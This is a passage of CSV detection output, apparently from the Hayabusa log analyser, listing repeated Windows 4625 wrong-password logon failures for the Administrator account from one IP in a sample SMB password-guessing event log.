NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.021 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mVv7vete3uXixggi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.060 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0PF6E3wRP0Tk39ss | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.106 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: touwF4IXUahG7jvJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.161 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lMOi7rygc7SJ5TPQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.208 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QjM1K5eFSA9U37oE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.258 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HgzyZqFU9v2kDVvG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.301 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hJeVj2h0sBxwBuGv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.355 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FNXI8b6Zcj1zU3JY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.408 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: q9DyH9oxFbRTCQ80 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.458 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5LZo1ljGLOVKhwcC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.556 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GvY6Q7RGKwjehARC | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.600 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uKLrHVMevqniTck8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.645 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ldxglvKFhLJQ3FV3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.685 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lRHIAxIj9wFRIg67 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.725 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Mc7nvfyDfWpnhhBx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.768 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NB7Y4gPbxose5TsQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.806 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yKFU6DJ8Wdtp2qdC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.841 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YlbxRctdClWIOjss | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.886 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LToi5ANf3tUteu4h | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.932 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 52YPmYviVPBqJ39Y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.985 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JpzKsyxEKNLd8l1u | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.037 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: r0vd6xEFevamX3jF | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.089 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WR9gJBoN1ra4NI2M | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.136 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rGYNVrDBIpMBu9GT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.186 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 57qCysbeaXx12CbY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.229 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xyJl4mHvgtTv53d9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.275 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jGBDZCtot2ogcKIO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.305 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bBhmbqZIi1gX62mM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.348 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: o7d4bcBJV1jlRgdt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.397 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FtfFb6hMHJiFXxai | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.441 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: frlsZMDcdb5WaW99 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.484 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CFV8UiUTRCCfab9l | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.537 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZI8P6ZeVRmQlbGtz | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.572 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UmJI7S1nj5hfWZqv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.624 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: veh8XInSzXe8E9UD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.669 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: a1BuBHLILZ4afwJC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.721 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NN2h7CHnGSCQZXan | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.758 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BU3fxfM1qGBJ55HS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.802 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q1OlBmhUABabDQbN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.848 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6DgQtHG7cT05kRXd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.890 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EUTe3JqVWgDcDcOS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.933 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nGKgUOyX3USQlESB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.978 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rcIJ8keQvgax1SuL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.025 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: A7jsyA7bWtVf4sLr | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.065 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mijnM28fwbgWzkvp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.115 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: o6dNmJo7vkacqxA6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.155 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FxvD2OWtadDT1Q2c | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.185 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WK8Esc50KVWIsLU5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.244 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: U07NeCzXSdx5Nlgs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.292 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tObVl72GJse2HCGp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.335 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nbEnp2E5a3N78OBC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.389 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IlRmyinJLWwj5yQg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.438 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 92H7tdXinUOxtOLV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.493 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Za42EUNuitIXaMBo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.547 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kz7OtswOreS0fdeS | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.608 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VMxY1IHx5VuvskM7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.667 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: d6uxMqLCcqHkuesV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.721 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TmeAWYvFEbqJp1rt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.826 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8tGAdT1CBRYRatVA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.925 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: K0h9ulMPWtj8bEKI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.052 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eLyLMNv6cOp3sgrq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.098 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KIAOs16X8nFxV45x | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.150 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Z4EbyEaUxUEyuiY6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.200 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SDnW5GABBLbe6eZ7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.258 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GublgQLD3RXQNmkX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.301 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2BQRppHTUHAoWPe4 | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.352 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gnh6HFlIW1zWEBu5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.402 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ulbcy5PWLYUm5Sy0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.449 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: L8rkZ7iBMam5o8VJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.493 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: n39Zox0PFeNirzyT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.543 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3u3YUCKxEo5pnKJX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.589 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wen3pHM88kSRkHNf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.625 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dGDHJ4KMm2zEMV0b | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.673 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lKZAB1nfXPYSLxsE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.724 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - 